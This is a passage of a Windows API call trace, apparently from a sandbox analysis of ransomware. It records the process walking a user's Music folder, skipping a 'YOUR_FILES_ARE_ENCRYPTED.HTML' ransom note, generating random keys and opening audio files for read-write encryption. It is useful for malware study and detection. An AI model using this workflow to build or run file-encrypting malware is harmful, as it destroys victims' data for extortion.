returned 1 [0168.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\jkVcEzcZorxOQEzS.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\jkvcezczorxoqezs.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0168.022] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=73931) returned 1 [0168.022] GetProcessHeap () returned 0x270000 [0168.022] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0168.024] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="0D") returned 2 [0168.024] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="7D") returned 2 [0168.024] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="85") returned 2 [0168.024] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="05") returned 2 [0168.024] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="51") returned 2 [0168.024] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="BE") returned 2 [0168.024] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="57") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="00") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="20") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="19") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="E8") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="88") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="85") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="7E") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="DF") returned 
2 [0168.025] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="8A") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="E7") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="DE") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="ED") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="56") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="D1") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="09") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="37") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="9D") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="7B") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="9B") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="8D") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="DE") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="AD") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="3E") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="5E") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="0A") returned 2 [0168.027] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\jkVcEzcZorxOQEzS.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\jkVcEzcZorxOQEzS.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\jkVcEzcZorxOQEzS.mp3" [0168.027] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, 
NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.027] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0168.043] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f5e0a00, ftCreationTime.dwHighDateTime=0x1d7d990, ftLastAccessTime.dwLowDateTime=0x6bb69df0, ftLastAccessTime.dwHighDateTime=0x1d7dc30, ftLastWriteTime.dwLowDateTime=0x6bb69df0, ftLastWriteTime.dwHighDateTime=0x1d7dc30, nFileSizeHigh=0x0, nFileSizeLow=0x11526, dwReserved0=0x867451, dwReserved1=0x0, cFileName="MTyX.wav", cAlternateFileName="")) returned 1 [0168.043] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\MTyX.wav") returned 52 [0168.043] lstrcmpW (lpString1="MTyX.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.043] PathFindExtensionW (pszPath="MTyX.wav") returned=".wav" [0168.043] lstrlenW (lpString=".wav") returned 4 [0168.043] PathFindExtensionW (pszPath="MTyX.wav") returned=".wav" [0168.043] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\MTyX.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\mtyx.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0168.044] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=70950) returned 1 [0168.044] GetProcessHeap () returned 0x270000 [0168.044] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0168.045] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="0D") returned 2 [0168.045] wsprintfW 
(in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="A0") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="44") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="0B") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="E9") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="7A") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="17") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="DE") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="BF") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="7C") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="73") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="76") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="50") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="AF") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="23") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="6B") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="AD") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="66") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="8E") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="77") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="A9") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="FB") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="82") 
returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="39") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="59") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="BC") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="9A") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="FA") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="58") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="75") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="19") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="2F") returned 2 [0168.047] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\MTyX.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\MTyX.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\MTyX.wav" [0168.047] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.047] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0168.052] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ca55840, ftCreationTime.dwHighDateTime=0x1d7db00, ftLastAccessTime.dwLowDateTime=0x1a72e530, ftLastAccessTime.dwHighDateTime=0x1d7e382, ftLastWriteTime.dwLowDateTime=0x1a72e530, ftLastWriteTime.dwHighDateTime=0x1d7e382, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x867451, dwReserved1=0x0, cFileName="RX0-yPNI7DvLWFXy1", cAlternateFileName="RX0-YP~1")) returned 1 [0168.056] wnsprintfW (in: 
pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1") returned 61 [0168.056] GetProcessHeap () returned 0x270000 [0168.056] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0168.056] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1" [0168.056] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\*" [0168.056] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ca55840, ftCreationTime.dwHighDateTime=0x1d7db00, ftLastAccessTime.dwLowDateTime=0x1a72e530, ftLastAccessTime.dwHighDateTime=0x1d7e382, ftLastWriteTime.dwLowDateTime=0x1a72e530, ftLastWriteTime.dwHighDateTime=0x1d7e382, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfec51fdf, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0168.056] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ca55840, ftCreationTime.dwHighDateTime=0x1d7db00, ftLastAccessTime.dwLowDateTime=0x1a72e530, ftLastAccessTime.dwHighDateTime=0x1d7e382, ftLastWriteTime.dwLowDateTime=0x1a72e530, ftLastWriteTime.dwHighDateTime=0x1d7e382, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfec51fdf, dwReserved1=0xffffffff, cFileName="..", 
cAlternateFileName="")) returned 1 [0168.056] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaba16e60, ftCreationTime.dwHighDateTime=0x1d7dd73, ftLastAccessTime.dwLowDateTime=0x8b108c70, ftLastAccessTime.dwHighDateTime=0x1d7e59e, ftLastWriteTime.dwLowDateTime=0x8b108c70, ftLastWriteTime.dwHighDateTime=0x1d7e59e, nFileSizeHigh=0x0, nFileSizeLow=0x187a4, dwReserved0=0xfec51fdf, dwReserved1=0xffffffff, cFileName="AXXYp8jRfDs2.wav", cAlternateFileName="AXXYP8~1.WAV")) returned 1 [0168.056] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\AXXYp8jRfDs2.wav") returned 78 [0168.056] lstrcmpW (lpString1="AXXYp8jRfDs2.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.056] PathFindExtensionW (pszPath="AXXYp8jRfDs2.wav") returned=".wav" [0168.056] lstrlenW (lpString=".wav") returned 4 [0168.056] PathFindExtensionW (pszPath="AXXYp8jRfDs2.wav") returned=".wav" [0168.057] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\AXXYp8jRfDs2.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\rx0-ypni7dvlwfxy1\\axxyp8jrfds2.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0168.057] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=100260) returned 1 [0168.057] GetProcessHeap () returned 0x270000 [0168.057] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0168.058] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="D9") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd422, 
param_2="%02X" | out: param_1="A4") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="B7") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="1D") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="0F") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="FB") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="42") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="F3") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="5C") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="EB") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="65") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="8D") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="07") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="5C") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="0C") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="89") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="EC") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="22") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="68") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="20") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="86") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="B8") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="0B") returned 2 [0168.059] wsprintfW 
(in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="0B") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="7F") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="96") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="08") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="8E") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="57") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="7A") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="D5") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="23") returned 2 [0168.060] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\AXXYp8jRfDs2.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\AXXYp8jRfDs2.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\AXXYp8jRfDs2.wav" [0168.060] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.060] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0168.063] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8160cc0, ftCreationTime.dwHighDateTime=0x1d7e35d, ftLastAccessTime.dwLowDateTime=0xa2f9ab80, ftLastAccessTime.dwHighDateTime=0x1d7e681, ftLastWriteTime.dwLowDateTime=0xa2f9ab80, ftLastWriteTime.dwHighDateTime=0x1d7e681, nFileSizeHigh=0x0, nFileSizeLow=0x16dad, dwReserved0=0xfec51fdf, dwReserved1=0xffffffff, cFileName="BA6j3JLUworAXTFvl0mV.wav", 
cAlternateFileName="BA6J3J~1.WAV")) returned 1 [0168.067] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\BA6j3JLUworAXTFvl0mV.wav") returned 86 [0168.067] lstrcmpW (lpString1="BA6j3JLUworAXTFvl0mV.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.067] PathFindExtensionW (pszPath="BA6j3JLUworAXTFvl0mV.wav") returned=".wav" [0168.067] lstrlenW (lpString=".wav") returned 4 [0168.067] PathFindExtensionW (pszPath="BA6j3JLUworAXTFvl0mV.wav") returned=".wav" [0168.067] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\BA6j3JLUworAXTFvl0mV.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\rx0-ypni7dvlwfxy1\\ba6j3jluworaxtfvl0mv.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0168.068] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=93613) returned 1 [0168.068] GetProcessHeap () returned 0x270000 [0168.068] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0168.068] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="33") returned 2 [0168.068] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="E8") returned 2 [0168.068] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="32") returned 2 [0168.068] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="27") returned 2 [0168.068] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="67") returned 2 [0168.068] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="85") returned 2 [0168.068] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="24") 
returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="E8") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="99") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="41") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="25") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="0E") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="22") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="93") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="3E") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="86") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="76") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="39") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="85") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="F3") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="43") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="C8") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="60") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="07") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="46") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="CD") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="9F") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="03") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd48e, 
param_2="%02X" | out: param_1="4E") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="7E") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="84") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="45") returned 2 [0168.070] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\BA6j3JLUworAXTFvl0mV.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\BA6j3JLUworAXTFvl0mV.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\BA6j3JLUworAXTFvl0mV.wav" [0168.070] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.070] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0168.078] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe994390, ftCreationTime.dwHighDateTime=0x1d7def8, ftLastAccessTime.dwLowDateTime=0x1a0e80e0, ftLastAccessTime.dwHighDateTime=0x1d7e33c, ftLastWriteTime.dwLowDateTime=0x1a0e80e0, ftLastWriteTime.dwHighDateTime=0x1d7e33c, nFileSizeHigh=0x0, nFileSizeLow=0x18f42, dwReserved0=0xfec51fdf, dwReserved1=0xffffffff, cFileName="RGmfEkC6DIb.wav", cAlternateFileName="RGMFEK~1.WAV")) returned 1 [0168.078] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\RGmfEkC6DIb.wav") returned 77 [0168.078] lstrcmpW (lpString1="RGmfEkC6DIb.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.078] PathFindExtensionW (pszPath="RGmfEkC6DIb.wav") returned=".wav" [0168.078] lstrlenW (lpString=".wav") returned 4 [0168.078] 
PathFindExtensionW (pszPath="RGmfEkC6DIb.wav") returned=".wav" [0168.078] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\RGmfEkC6DIb.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\rx0-ypni7dvlwfxy1\\rgmfekc6dib.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0168.079] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=102210) returned 1 [0168.079] GetProcessHeap () returned 0x270000 [0168.079] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0168.080] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="80") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="AF") returned 2 [0168.080] wsprintfW (in: 